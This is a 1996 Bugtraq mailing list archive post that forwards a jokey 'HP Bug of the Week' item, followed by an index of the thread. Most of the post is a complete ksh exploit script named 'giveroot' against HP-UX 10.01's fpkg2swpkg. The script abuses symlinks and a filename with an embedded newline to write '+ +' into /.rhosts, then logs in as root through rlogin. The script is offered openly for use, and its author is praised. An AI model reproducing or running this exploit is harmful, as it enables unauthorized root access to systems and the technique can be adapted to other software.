Bugtraq mailing list archives
HP Bug of the Week: OFS
From: aleph1 () dfw net (Aleph One)
Date: Sat, 23 Nov 1996 08:24:00 -0600
From our wacked out, and most of the time high, friends at SOD comes:
Other Folks Scripts For this new addition to the HP Bug of the Week page, we're adding scripts that were sent to SOD by other Scriptors out there in Netland. We're starting off with a buggeridoo from a Scriptor named the Dog Catcher who'd like to show us all a bug in version 10's /usr/sbin/fpkg2swpkg. We would like to thank Dog Catcher for all his efforts. He has been given the SOD Honorary Homeboy status which grants him free access to the SOD Corporate Headquarters, an "I (heart) HP" baseball cap, and a vial of amyl nitrate. Party on, DC! #!/bin/ksh # giveroot Version 1.1 (C) 1996 Dog Catcher # gives you root by poking + + into /.rhosts # this version even works on mode 600 /.rhosts # tested on HP/UX 10.01 # setup stuff FILE=/tmp/fpkg2swpk LOG=/tmp/fpkg2swpkg.log DUMMY=/tmp/"`echo '\n+ +'`" SUCKER=/usr/sbin/fpkg2swpkg RHOSTS=/.rhosts # naughty bits touch ${FILE} rm -f ${LOG} ln -s ${RHOSTS} ${LOG} ln -s ${SUCKER} "${DUMMY}" "${DUMMY}" ${FILE} # tidy up rm -f ${FILE} "${DUMMY}" ${LOG} # i wanna hash prompt rlogin `uname -n` -l root Aleph One / aleph1 () dfw net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Current thread:
- Administratriva, (continued)
- Administratriva Aleph One (Nov 26)
- A security issue of a different kind. Alan Brown (Nov 26)
- BOOTP/DHCP security itudps (Nov 26)
- Re: BOOTP/DHCP security Alan Cox (Nov 27)
- Re: A security issue of a different kind. Jon Peatfield (Nov 27)
- Re: A security issue of a different kind. Piete Brooks (Nov 27)
- Major Security Vulnerabilities in Remote CD Databases David J. Meltzer (Nov 26)
- Re: Major Security Vulnerabilities in Remote CD Databases itudps (Nov 26)
- lquerypv fix Troy Bollinger (Nov 25)
- HP Bug of the Week! Aleph One (Nov 23)
- HP Bug of the Week: OFS Aleph One (Nov 23)
- Serious BIND resolver problem. Oliver Friedrichs (Nov 18)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Alan Cox (Nov 19)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Joe Zbiciak (Nov 19)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Tim Newsham (Nov 20)